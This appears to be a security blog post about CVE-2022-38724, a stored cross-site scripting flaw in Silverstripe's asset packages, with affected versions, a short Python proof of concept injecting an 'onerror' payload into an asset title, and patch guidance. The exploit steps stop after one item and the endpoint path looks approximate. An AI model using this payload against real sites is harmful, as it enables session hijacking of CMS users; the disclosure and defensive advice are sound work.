The open-source content management system Silverstripe powers thousands of websites and applications around the world. In September 2022, a security flaw (CVE-2022-38724) was discovered in Silverstripe’s core packages, which could allow malicious users to inject JavaScript (XSS), potentially compromising site security and users’ personal data.
This post will walk you through what the vulnerability is, how it works, how it can be exploited, as well as how to protect your site.
Affected Packages and Versions
The cross-site scripting (XSS) issue affects the following Silverstripe packages up to and including:
- silverstripe/framework ≤ 4.11.
- silverstripe/assets ≤ 1.11.
- silverstripe/asset-admin ≤ 1.11.
References
- GitHub Security Advisory GHSA-qh8v-39w6-7gc5
- NVD Entry CVE-2022-38724
What is a Stored XSS?
A Stored XSS vulnerability is a security problem that occurs when a web application receives user input, stores it, and then later presents it without proper sanitization. An attacker can inject JavaScript code, which gets executed in the browser of any user who views the injected content.
Vulnerability Details
The advisory tells us that Silverstripe failed to safely escape values that could be sent from user input and displayed on admin/asset screens. Attackers with at least CMS author/editor permissions could upload files or set asset metadata containing malicious JavaScript.
When that asset was later viewed by someone (even an admin), the code would execute in the context of their session.
Example of Exploit
A common way to exploit XSS in asset metadata is by uploading a file with a malicious <script> tag inside its title or description.
Exploit Steps
1. Login as a Silverstripe user with CMS author/editor privileges.
Proof-of-Concept Code
Let's simulate the vulnerability using a Python requests script (replace credentials & URL with real values):
import requests
LOGIN_URL = "https://example.com/Security/login";
ASSET_ADMIN_URL = "https://example.com/admin/assets/EditForm/field/File/setTitle";
# 1. Login (Session handling skipped for brevity)
s = requests.Session()
s.post(LOGIN_URL, data={
"Email": "editor@example.com",
"Password": "yourpassword",
})
# 2. Inject JS payload in asset title
payload = '<img src=x onerror=alert("CVE-2022-38724")>'
asset_id = "123" # Replace with real asset ID
# 3. Submit payload
s.post(f"{ASSET_ADMIN_URL}/{asset_id}", data={
"Title": payload,
"SecurityID": "csrf-token-here"
})
# 4. When anyone visits asset admin page, XSS fires
*Note: The actual form field names and CSRF mechanisms may differ based on your setup.*
Visual Demonstration
After saving the asset with the payload in its title, whenever the asset is listed or previewed in Silverstripe Asset Admin, this JavaScript will execute in the browser.
How To Fix
Update! The patch is available in Silverstripe 4.11.1 and above.
- For silverstripe/framework, switch to 4.11.1+
- For silverstripe/assets and silverstripe/asset-admin, switch to 1.11.1+
Composer Update
composer require "silverstripe/framework:^4.11.1" "silverstripe/assets:^1.11.1" "silverstripe/asset-admin:^1.11.1"
composer update
If you cannot update immediately, sanitize all user content and restrict asset metadata editing only to trusted accounts.
Technical Patch Explanation
The fix ensures that all user-generated metadata displayed in asset admin or elsewhere is escaped using HTML-encoding functions, preventing browser interpretation as HTML or JavaScript.
Example simplified fix in PHP
echo Convert::raw2xml($asset->Title); // Encodes special characters
Community Response & Other Advice
Silverstripe maintainers acted quickly on this. You should regularly review your composer dependencies, especially if you allow users to control files or asset metadata.
Regularly run security audits using tools like OWASP ZAP or Burp Suite.
Summary
- CVE-2022-38724 enables XSS in Silverstripe up to v4.11. (framework/assets/asset-admin)
References
- Original Advisory
- NVD Entry
- Silverstripe Documentation
Timeline
Published on: 11/23/2022 00:15:00 UTC
Last modified on: 11/28/2022 14:52:00 UTC